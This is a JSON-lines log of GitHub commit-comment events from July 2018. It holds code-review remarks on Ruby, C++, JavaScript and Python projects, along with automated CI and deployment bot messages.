{"id":"7991385767","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29769998,"position":31,"line":32,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"9d5e25baa1f121bdb9bff0f7bc2001008e3b5ef3","created_at":"2018-07-19T20:16:28Z","updated_at":"2018-07-19T20:16:28Z","author_association":"OWNER","body":"Sounds good, will do."}},"created_at":"2018-07-19T20:16:28Z"}
{"id":"7991386051","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29769999,"position":17,"line":12,"path":"re_triangle.rb","commit_id":"a06f54b27b36d92786754a6ddd31736dcec508b4","created_at":"2018-07-19T20:16:31Z","updated_at":"2018-07-19T20:16:31Z","author_association":"NONE","body":"писать выражения if something == true редко имеет смысл. В руби все кроме false и nil интерпретируется как \"правдивые\" значения. Так-что в данном случае можно смело писать\r\n```\r\nif pif\r\n  # something\r\n```\r\nКстати pif не самое говорящее название. Вот ниже ты пишешь rectangular - что гораздо лучше отражает суть происходящего в коде"}},"created_at":"2018-07-19T20:16:31Z"}
{"id":"7991387214","type":"CommitCommentEvent","actor":{"login":"alexonea"},"repo":{"name":"thetopor/topor-media-server"},"payload":{"comment":{"id":29770002,"position":69,"line":69,"path":"src/libtmplay/mixer.cc","commit_id":"47f4ed9a5cda27a9ad568314b53c17ccd85453e8","created_at":"2018-07-19T20:16:45Z","updated_at":"2018-07-19T20:16:45Z","author_association":"MEMBER","body":"protection need, while you update the ```_channels``` container, you might also read it in the select loop. All access to the container must be guarded. "}},"created_at":"2018-07-19T20:16:45Z"}
{"id":"7991387668","type":"CommitCommentEvent","actor":{"login":"hnasiri"},"repo":{"name":"hnasiri/LearnGithub"},"payload":{"comment":{"id":29770004,"position":null,"line":null,"path":null,"commit_id":"25dbee67152886c3174c77fbce9e02434cf9d050","created_at":"2018-07-19T20:16:50Z","updated_at":"2018-07-19T20:16:50Z","author_association":"OWNER","body":"2'nd edit"}},"created_at":"2018-07-19T20:16:50Z"}
{"id":"7991390959","type":"CommitCommentEvent","actor":{"login":"alexonea"},"repo":{"name":"thetopor/topor-media-server"},"payload":{"comment":{"id":29770014,"position":89,"line":89,"path":"src/libtmplay/mixer.cc","commit_id":"47f4ed9a5cda27a9ad568314b53c17ccd85453e8","created_at":"2018-07-19T20:17:29Z","updated_at":"2018-07-19T20:17:29Z","author_association":"MEMBER","body":"It's ok to not guard it since it is a single entity who writes to it and a single entity who reads from it."}},"created_at":"2018-07-19T20:17:29Z"}
{"id":"7991392044","type":"CommitCommentEvent","actor":{"login":"pndurette"},"repo":{"name":"pndurette/gTTS"},"payload":{"comment":{"id":29770017,"position":null,"line":null,"path":null,"commit_id":"21b216b0b3ff2d245a9fa81b2fe5018be52aad17","created_at":"2018-07-19T20:17:43Z","updated_at":"2018-07-19T20:17:43Z","author_association":"OWNER","body":"Do you have any info on this issue?"}},"created_at":"2018-07-19T20:17:43Z"}
{"id":"7991396651","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29770025,"position":27,"line":18,"path":"re_triangle.rb","commit_id":"a06f54b27b36d92786754a6ddd31736dcec508b4","created_at":"2018-07-19T20:18:38Z","updated_at":"2018-07-19T20:18:38Z","author_association":"NONE","body":"Вот это условие нужно скомбинировать с условием выше. То есть если треугольник прямоугольный и равносторонний, то выводим один результат, elsif он только прямоугольный выводим другой результат"}},"created_at":"2018-07-19T20:18:38Z"}
{"id":"7991396746","type":"CommitCommentEvent","actor":{"login":"oliuz"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29770027,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T20:18:39Z","updated_at":"2018-07-19T20:18:39Z","author_association":"NONE","body":"Many thanks in advance!"}},"created_at":"2018-07-19T20:18:39Z"}
{"id":"7991397833","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29770031,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-19T20:18:52Z","updated_at":"2018-07-19T20:18:52Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1696 of 1696 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-19T20:18:52Z"}
{"id":"7991398628","type":"CommitCommentEvent","actor":{"login":"dmitrijsgnennijsCTS"},"repo":{"name":"dmitrijsgnennijsCTS/A_level_project"},"payload":{"comment":{"id":29770033,"position":null,"line":null,"path":null,"commit_id":"f70b6fe7524c57f15191cecaa5031100b3fa6ce2","created_at":"2018-07-19T20:19:02Z","updated_at":"2018-07-19T20:19:02Z","author_association":"OWNER","body":"If(lines !=None) gets rid of crashing"}},"created_at":"2018-07-19T20:19:02Z"}
{"id":"7991402252","type":"CommitCommentEvent","actor":{"login":"Zolmeister"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29770042,"position":23,"line":584,"path":"test/Render.spec.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T20:19:45Z","updated_at":"2018-07-19T20:19:45Z","author_association":"NONE","body":"I don't follow.\r\nthe conditional only applies to `<input>`, which I figured this test was testing"}},"created_at":"2018-07-19T20:19:45Z"}
{"id":"7991402299","type":"CommitCommentEvent","actor":{"login":"jumanjiman"},"repo":{"name":"jumanjihouse/autostager"},"payload":{"comment":{"id":29770043,"position":13,"line":52,"path":".pre-commit-config.yaml","commit_id":"f50e61533ceb7d73abe00c2049a4e89f67baf38b","created_at":"2018-07-19T20:19:46Z","updated_at":"2018-07-19T20:19:46Z","author_association":"MEMBER","body":"ah, yes indeed. tyvm!"}},"created_at":"2018-07-19T20:19:46Z"}
{"id":"7991403110","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29770045,"position":27,"line":18,"path":"re_triangle.rb","commit_id":"a06f54b27b36d92786754a6ddd31736dcec508b4","created_at":"2018-07-19T20:19:56Z","updated_at":"2018-07-19T20:19:56Z","author_association":"NONE","body":"Кстати обрати внимание, что если ты будешь использовать отсортированные стороны (cat1, cat2, hip) - то можно будет сравнивать только катеты. Потому-что в прямоугольном треугольнике гипотинуза всегда будет длинней"}},"created_at":"2018-07-19T20:19:56Z"}
{"id":"7991411796","type":"CommitCommentEvent","actor":{"login":"mauriciospesot"},"repo":{"name":"mauriciospesot/freeCodeCamp-curriculum"},"payload":{"comment":{"id":29770061,"position":null,"line":null,"path":null,"commit_id":"f8b136d7af2dc427903a6a57f1a020597285d146","created_at":"2018-07-19T20:21:42Z","updated_at":"2018-07-19T20:21:42Z","author_association":"OWNER","body":"Se arreglo el numero del dia 43 no el 42"}},"created_at":"2018-07-19T20:21:42Z"}
{"id":"7991416549","type":"CommitCommentEvent","actor":{"login":"roji"},"repo":{"name":"FlorianRainer/npgsql"},"payload":{"comment":{"id":29770077,"position":null,"line":null,"path":null,"commit_id":"52cb4aba451fa19b5520e1544e4c5de22866ac72","created_at":"2018-07-19T20:22:39Z","updated_at":"2018-07-19T20:22:39Z","author_association":"NONE","body":"Ohh, ok :) Good thing I approved it again then :)"}},"created_at":"2018-07-19T20:22:39Z"}
{"id":"7991418394","type":"CommitCommentEvent","actor":{"login":"VM-Robin"},"repo":{"name":"VM-Robin/weekly"},"payload":{"comment":{"id":29770083,"position":37,"line":37,"path":"lena.html","commit_id":"f4b00a169a3159d5dda803f996ab4b3423ae531f","created_at":"2018-07-19T20:23:02Z","updated_at":"2018-07-19T20:23:02Z","author_association":"OWNER","body":".ö"}},"created_at":"2018-07-19T20:23:02Z"}
{"id":"7991420556","type":"CommitCommentEvent","actor":{"login":"jqdurham"},"repo":{"name":"Ortus-Solutions/TestBox"},"payload":{"comment":{"id":29770091,"position":null,"line":null,"path":null,"commit_id":"1d534ac053ec348d313745c8c39c02b99b3ce8bc","created_at":"2018-07-19T20:23:27Z","updated_at":"2018-07-19T20:23:27Z","author_association":"CONTRIBUTOR","body":"I worked around it by modifying my task runner to clean up the files, but it would be nice to have a method  (or argument on run()) on Testbox.cfc to do this so my runner needn't know about Testbox's internal directory structure."}},"created_at":"2018-07-19T20:23:27Z"}
{"id":"7991450292","type":"CommitCommentEvent","actor":{"login":"Zolmeister"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29770161,"position":23,"line":584,"path":"test/Render.spec.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T20:29:33Z","updated_at":"2018-07-19T20:29:33Z","author_association":"NONE","body":"yes, to clarify my issue is only with the second test, as it doesn't test the `if element.type === 'input'` branch because it could simply be calling `setAttribute()` every time and you see the same result"}},"created_at":"2018-07-19T20:29:33Z"}
{"id":"7991452734","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29770165,"position":null,"line":null,"path":null,"commit_id":"8a4858bdcfba5b2c9fca27869db72704af39c2e6","created_at":"2018-07-19T20:30:05Z","updated_at":"2018-07-19T20:30:05Z","author_association":"NONE","body":"I second that emotion. Welcome back in action. Good job."}},"created_at":"2018-07-19T20:30:05Z"}
{"id":"7991453038","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29770166,"position":43,"line":31,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"3a135f21c95bf2e361a9fb25f117dbe81d724875","created_at":"2018-07-19T20:30:09Z","updated_at":"2018-07-19T20:30:09Z","author_association":"COLLABORATOR","body":"What if there are a lot of sequence records and a lot of them don't have any SNVs associated with them in the DF? \r\n\r\nYou are doing a list comprehension above on line 29 using a for/each pattern while here on line 31 you're doing a `for i in 0..N` and then accessing the same item from `gb_record` multiple times, and it doesn't seem like the `index` variable is used anywhere else except accessing a sequence record. Could you please refactor this code to make it more clean and efficient?\r\n\r\nAlso you're rereading and re-parsing the same file over and over, when you should just try to read through it once to get the information you need (in a dictionary?) and using that in this function. Please try limiting your search to only the relevant sequence records to the DF of interest. "}},"created_at":"2018-07-19T20:30:09Z"}
{"id":"7991453275","type":"CommitCommentEvent","actor":{"login":"koebi"},"repo":{"name":"nnev/website"},"payload":{"comment":{"id":29770168,"position":16,"line":71,"path":"www/edit_c14.md","commit_id":"3f98ca44114244c5a8deb1443abba731ecb55d48","created_at":"2018-07-19T20:30:12Z","updated_at":"2018-07-19T20:30:12Z","author_association":"CONTRIBUTOR","body":"bitte Deutsch wie unten :)"}},"created_at":"2018-07-19T20:30:12Z"}
{"id":"7991453855","type":"CommitCommentEvent","actor":{"login":"developerITra"},"repo":{"name":"developerITra/Repository-test"},"payload":{"comment":{"id":29770172,"position":null,"line":null,"path":null,"commit_id":"1e493ea945e0388892f2e0622f6668d980d1c492","created_at":"2018-07-19T20:30:18Z","updated_at":"2018-07-19T20:30:18Z","author_association":"OWNER","body":"commented, ready to go."}},"created_at":"2018-07-19T20:30:18Z"}
{"id":"7991454986","type":"CommitCommentEvent","actor":{"login":"EkaterinaGanshina"},"repo":{"name":"EkaterinaGanshina/smart-reader"},"payload":{"comment":{"id":29770174,"position":17,"line":5,"path":"classes/FB2parser.class.php","commit_id":"ee1e6f29072151df5fb0f49be870f01e8bcd50b8","created_at":"2018-07-19T20:30:29Z","updated_at":"2018-07-19T20:30:29Z","author_association":"OWNER","body":"Need to replace by `constants`"}},"created_at":"2018-07-19T20:30:29Z"}
{"id":"7991455518","type":"CommitCommentEvent","actor":{"login":"healygreggatyahoo"},"repo":{"name":"healygreggatyahoo/rimwrapzstore"},"payload":{"comment":{"id":29770176,"position":null,"line":null,"path":null,"commit_id":"29bc312e7bfab94f7d47a1416dadb1c9e5ecd88b","created_at":"2018-07-19T20:30:35Z","updated_at":"2018-07-19T20:30:35Z","author_association":"OWNER","body":"Created multidev environment [rimwrapzstore#ci-2](https://dashboard.pantheon.io/sites/1edbd345-d119-4e9d-800f-247a8e0b34cb#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-rimwrapzstore.pantheonsite.io/)"}},"created_at":"2018-07-19T20:30:35Z"}
{"id":"7991457191","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29770183,"position":null,"line":null,"path":null,"commit_id":"a2385fb761d09d129710e1c9ff42161c8fd66891","created_at":"2018-07-19T20:30:53Z","updated_at":"2018-07-19T20:30:53Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#pr-18](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#pr-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-18-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-19T20:30:53Z"}
{"id":"7991459514","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29770188,"position":null,"line":null,"path":null,"commit_id":"f869adfc1d0909771b07abb603406cbc8a1ed278","created_at":"2018-07-19T20:31:20Z","updated_at":"2018-07-19T20:31:20Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-93](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-93).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-93-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-19T20:31:20Z"}
{"id":"7991460075","type":"CommitCommentEvent","actor":{"login":"developerITra"},"repo":{"name":"developerITra/Repository-test"},"payload":{"comment":{"id":29770189,"position":null,"line":null,"path":null,"commit_id":"1e493ea945e0388892f2e0622f6668d980d1c492","created_at":"2018-07-19T20:31:26Z","updated_at":"2018-07-19T20:31:26Z","author_association":"OWNER","body":"doc created y'day"}},"created_at":"2018-07-19T20:31:26Z"}
{"id":"7991463732","type":"CommitCommentEvent","actor":{"login":"squarenabla"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29770194,"position":127,"line":398,"path":"extern/official_tf_resnet/resnet_model.py","commit_id":"b20adc7f7b0a600b87ec1e3b39c1fa6501d53b4e","created_at":"2018-07-19T20:32:08Z","updated_at":"2018-07-19T20:32:08Z","author_association":"COLLABORATOR","body":"It's removed in the next commit"}},"created_at":"2018-07-19T20:32:08Z"}
{"id":"7991464303","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29770197,"position":null,"line":null,"path":null,"commit_id":"c1c6a761fb73002b0f39e0864e2c3721e6c91ba4","created_at":"2018-07-19T20:32:14Z","updated_at":"2018-07-19T20:32:14Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-38](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-38).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-38-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-19T20:32:14Z"}
{"id":"7991465799","type":"CommitCommentEvent","actor":{"login":"thysultan"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29770199,"position":26,"line":153,"path":"src/Core/Commit.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T20:32:32Z","updated_at":"2018-07-19T20:32:32Z","author_association":"OWNER","body":">Also looking at commitUnmountElement we check element.active which would mean a child element.active would have to be false while the parent is true.\r\n\r\n`commitUnmountElement` only checks the top most element `commitUnmountElement` travels into inner children, and the top most element is not necessarily the element the error was raised on.\r\n\r\n>I'm trying to find where the error would come from in this block\r\n\r\nThe error would come from a `componentWillUnmount >getLifecycleUnmount > unmountComponentInstance > commitUnmountElementComponent`.\r\n\r\n>Also nothing was catching this before, so I don't think throwing here was ever expected.\r\n\r\nYes this particular way of doing it is not necessary to address the bug it fixes, we could also just check `element.acitve` and set element.active to false before the inner block(like before).\r\n\r\nThis particular way does however allow `componentWillUnmount` more room to execute unmount logic that might update the screen before yielding back(I should probably add a test for that)."}},"created_at":"2018-07-19T20:32:32Z"}
{"id":"7991466152","type":"CommitCommentEvent","actor":{"login":"Anthony-Glatt"},"repo":{"name":"Anthony-Glatt/Projects"},"payload":{"comment":{"id":29770200,"position":null,"line":null,"path":null,"commit_id":"482868409d63c36a0ecbe6d003293a7ab089674f","created_at":"2018-07-19T20:32:35Z","updated_at":"2018-07-19T20:32:35Z","author_association":"OWNER","body":"Haha could fly to Italy and get a pizza there for that cost\n\nOn Thu, Jul 19, 2018, 12:22 PM Dennis Sauve <notifications@github.com>\nwrote:\n\n> I'd like to, but it looks like the delivery charge will be somewhere in\n> the neighborhood of $700.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Anthony-Glatt/Projects/commit/482868409d63c36a0ecbe6d003293a7ab089674f#commitcomment-29769457>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am6jBmrel2ki4OCgBh4r_tM-rXVgf0lDks5uINyKgaJpZM4VVlPL>\n> .\n>\n"}},"created_at":"2018-07-19T20:32:35Z"}
{"id":"7991467560","type":"CommitCommentEvent","actor":{"login":"mlissner"},"repo":{"name":"freelawproject/juriscraper"},"payload":{"comment":{"id":29770203,"position":177,"line":148,"path":"tests/test_pacer.py","commit_id":"33756fc9ab9ab3511d410b18b27791cd8e922c17","created_at":"2018-07-19T20:32:52Z","updated_at":"2018-07-19T20:32:52Z","author_association":"MEMBER","body":"Might as well nuke that test. I think part of its problem was that it was wildly slow."}},"created_at":"2018-07-19T20:32:52Z"}
{"id":"7991470296","type":"CommitCommentEvent","actor":{"login":"wtfblub"},"repo":{"name":"wtfblub/NetspherePirates"},"payload":{"comment":{"id":29770205,"position":null,"line":null,"path":null,"commit_id":"04f387d7a9c242cacd3618653ad4211c3b4aa569","created_at":"2018-07-19T20:33:23Z","updated_at":"2018-07-19T20:33:23Z","author_association":"OWNER","body":"Race conditions are going to be less of a problem and yes its still the same version."}},"created_at":"2018-07-19T20:33:23Z"}
{"id":"7991470504","type":"CommitCommentEvent","actor":{"login":"MalloyDelacroix"},"repo":{"name":"MalloyDelacroix/DownloaderForReddit"},"payload":{"comment":{"id":29770206,"position":null,"line":null,"path":null,"commit_id":"6be5d5a5145174eb56b53ab222941cabe648c331","created_at":"2018-07-19T20:33:25Z","updated_at":"2018-07-19T20:33:25Z","author_association":"OWNER","body":"At this point you would need to install python and the required packages and run it from the command line.  There will be a new release with an executable released soon though.  If you don't want to wait for the release and you have some python experience, [this wiki page](https://github.com/MalloyDelacroix/DownloaderForReddit/wiki/Setting-Up-A-Development-Environment) explains how to setup a development environment.\r\n\r\nI doubt this will fix the problem that you posted an issue about though, this shouldn't affect imgur credits."}},"created_at":"2018-07-19T20:33:25Z"}
{"id":"7991476178","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"FRidh/nixpkgs"},"payload":{"comment":{"id":29770220,"position":null,"line":null,"path":null,"commit_id":"5aa92b6c94b002b602299f55f48ad0e2f6b390ae","created_at":"2018-07-19T20:34:36Z","updated_at":"2018-07-19T20:34:36Z","author_association":"NONE","body":"I honestly don't know. It's been 2+ years since I worried about the memory use of that code and I have no clue what the characteristics are these days. I'd assume that @nbp knows more about that. Making that without doing *some* amount of profiling beforehand feels a bit reckless, though."}},"created_at":"2018-07-19T20:34:36Z"}
{"id":"7991476411","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29770221,"position":null,"line":null,"path":null,"commit_id":"a9f4e506341143e8acb5859d5317e107b5f92600","created_at":"2018-07-19T20:34:39Z","updated_at":"2018-07-19T20:34:39Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#2555 "}},"created_at":"2018-07-19T20:34:39Z"}
{"id":"7991479674","type":"CommitCommentEvent","actor":{"login":"Zolmeister"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29770234,"position":26,"line":153,"path":"src/Core/Commit.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T20:35:21Z","updated_at":"2018-07-19T20:35:21Z","author_association":"NONE","body":"yes, a test would definitely help me wrap my head around it"}},"created_at":"2018-07-19T20:35:21Z"}
{"id":"7991480088","type":"CommitCommentEvent","actor":{"login":"peterk87"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29770238,"position":103,"line":73,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"3a135f21c95bf2e361a9fb25f117dbe81d724875","created_at":"2018-07-19T20:35:26Z","updated_at":"2018-07-19T20:35:26Z","author_association":"COLLABORATOR","body":"Could you refactor this code into a function that takes the `ratio` boolean and other values as input and returns a string?\r\n\r\nAlso if you're not using multiline strings anymore please use single quotations rather than triple quotes."}},"created_at":"2018-07-19T20:35:26Z"}
{"id":"7991485114","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29770252,"position":null,"line":null,"path":null,"commit_id":"ead6ea7e2dba8386beb396c2a3e079bd82e3ac5d","created_at":"2018-07-19T20:36:28Z","updated_at":"2018-07-19T20:36:28Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nmissed comma between flow collection entries at line 40, column 41:\n     ...     taskId: {$eval: as_slugid('${browser.name}-${browser.channel ... \n                                         ^\n\n</details>"}},"created_at":"2018-07-19T20:36:28Z"}
{"id":"7991485339","type":"CommitCommentEvent","actor":{"login":"thysultan"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29770253,"position":23,"line":584,"path":"test/Render.spec.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T20:36:31Z","updated_at":"2018-07-19T20:36:31Z","author_association":"OWNER","body":"Yes this tests that every works as expected when the condition is false https://github.com/thysultan/dio.js/commit/73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db#diff-c0d0bd9799ed8a4f51de35affa29e9f1R142. For example not testing it would yield 99.8% test coverage."}},"created_at":"2018-07-19T20:36:31Z"}
{"id":"7991492724","type":"CommitCommentEvent","actor":{"login":"healygreggatyahoo"},"repo":{"name":"healygreggatyahoo/rimwrapzstore"},"payload":{"comment":{"id":29770269,"position":null,"line":null,"path":null,"commit_id":"04f3cf77548105812942ff0a31247cf51930dba9","created_at":"2018-07-19T20:38:10Z","updated_at":"2018-07-19T20:38:10Z","author_association":"OWNER","body":"Created multidev environment [rimwrapzstore#ci-4](https://dashboard.pantheon.io/sites/1edbd345-d119-4e9d-800f-247a8e0b34cb#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-rimwrapzstore.pantheonsite.io/)"}},"created_at":"2018-07-19T20:38:10Z"}
{"id":"7991496504","type":"CommitCommentEvent","actor":{"login":"lorawoodford"},"repo":{"name":"mark-cooper/fad-playbook"},"payload":{"comment":{"id":29770275,"position":null,"line":null,"path":null,"commit_id":"f6e0c3ff3a71b615d79d1acf4089e71a6f176e94","created_at":"2018-07-19T20:38:55Z","updated_at":"2018-07-19T20:38:55Z","author_association":"NONE","body":"Changes incorporated."}},"created_at":"2018-07-19T20:38:55Z"}
{"id":"7991498433","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29770283,"position":5,"line":47,"path":"Applications/spire/source/book_view/market_list_item.cpp","commit_id":"2e6a515664178bc2a34af067056ca150444337cd","created_at":"2018-07-19T20:39:20Z","updated_at":"2018-07-19T20:39:20Z","author_association":"COLLABORATOR","body":"Just emplace(), no parameters. Take some to review how emplace works to make sure you understand why you don't need to pass in any parameters."}},"created_at":"2018-07-19T20:39:20Z"}
{"id":"7991498699","type":"CommitCommentEvent","actor":{"login":"Aipeeri"},"repo":{"name":"Aipeeri/gitHubREp"},"payload":{"comment":{"id":29770284,"position":null,"line":null,"path":null,"commit_id":"f1690bc1015aa0313573bb8296129776c4d8ca1f","created_at":"2018-07-19T20:39:24Z","updated_at":"2018-07-19T20:39:24Z","author_association":"OWNER","body":"there is a conflict"}},"created_at":"2018-07-19T20:39:24Z"}
{"id":"7991499256","type":"CommitCommentEvent","actor":{"login":"thysultan"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29770285,"position":23,"line":584,"path":"test/Render.spec.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T20:39:30Z","updated_at":"2018-07-19T20:39:30Z","author_association":"OWNER","body":">as in, <span>.setAttribute() should never be called, as it should be <span>.form=xxx\r\n\r\nThe `<element>.property = value` path is only taken when the property exists on the elements DOM object."}},"created_at":"2018-07-19T20:39:30Z"}
{"id":"7991504840","type":"CommitCommentEvent","actor":{"login":"junaruga"},"repo":{"name":"sass/ruby-sass"},"payload":{"comment":{"id":29770293,"position":null,"line":null,"path":null,"commit_id":"8b77fc88f8bdbc21b44d0a5be7833d91a5edb04c","created_at":"2018-07-19T20:40:39Z","updated_at":"2018-07-19T20:40:39Z","author_association":"CONTRIBUTOR","body":"Why you did this change?\r\n"}},"created_at":"2018-07-19T20:40:39Z"}
{"id":"7991505816","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29770295,"position":null,"line":null,"path":null,"commit_id":"1b6639e645d21eab2052daa5800378b1e4530f69","created_at":"2018-07-19T20:40:53Z","updated_at":"2018-07-19T20:40:53Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-819](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-819).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-819-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T20:40:53Z"}
{"id":"7991506829","type":"CommitCommentEvent","actor":{"login":"bdw429s"},"repo":{"name":"Ortus-Solutions/TestBox"},"payload":{"comment":{"id":29770296,"position":null,"line":null,"path":null,"commit_id":"1d534ac053ec348d313745c8c39c02b99b3ce8bc","created_at":"2018-07-19T20:41:06Z","updated_at":"2018-07-19T20:41:06Z","author_association":"COLLABORATOR","body":"For what it's worth, the tmp folder is a configurable item I believe so it's conceivable that the calling could would or at least could know about it since it's documented.  I wouldn't be opposed to a convenience method though to clear the temp folder."}},"created_at":"2018-07-19T20:41:06Z"}
{"id":"7991507789","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29770299,"position":null,"line":null,"path":null,"commit_id":"bd32bf0a802a24641c78518a7c862d9f31762c3a","created_at":"2018-07-19T20:41:18Z","updated_at":"2018-07-19T20:41:18Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should have required property 'created'\n  * data should have required property 'deadline'\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-19T20:41:18.563Z\n\n</details>"}},"created_at":"2018-07-19T20:41:18Z"}
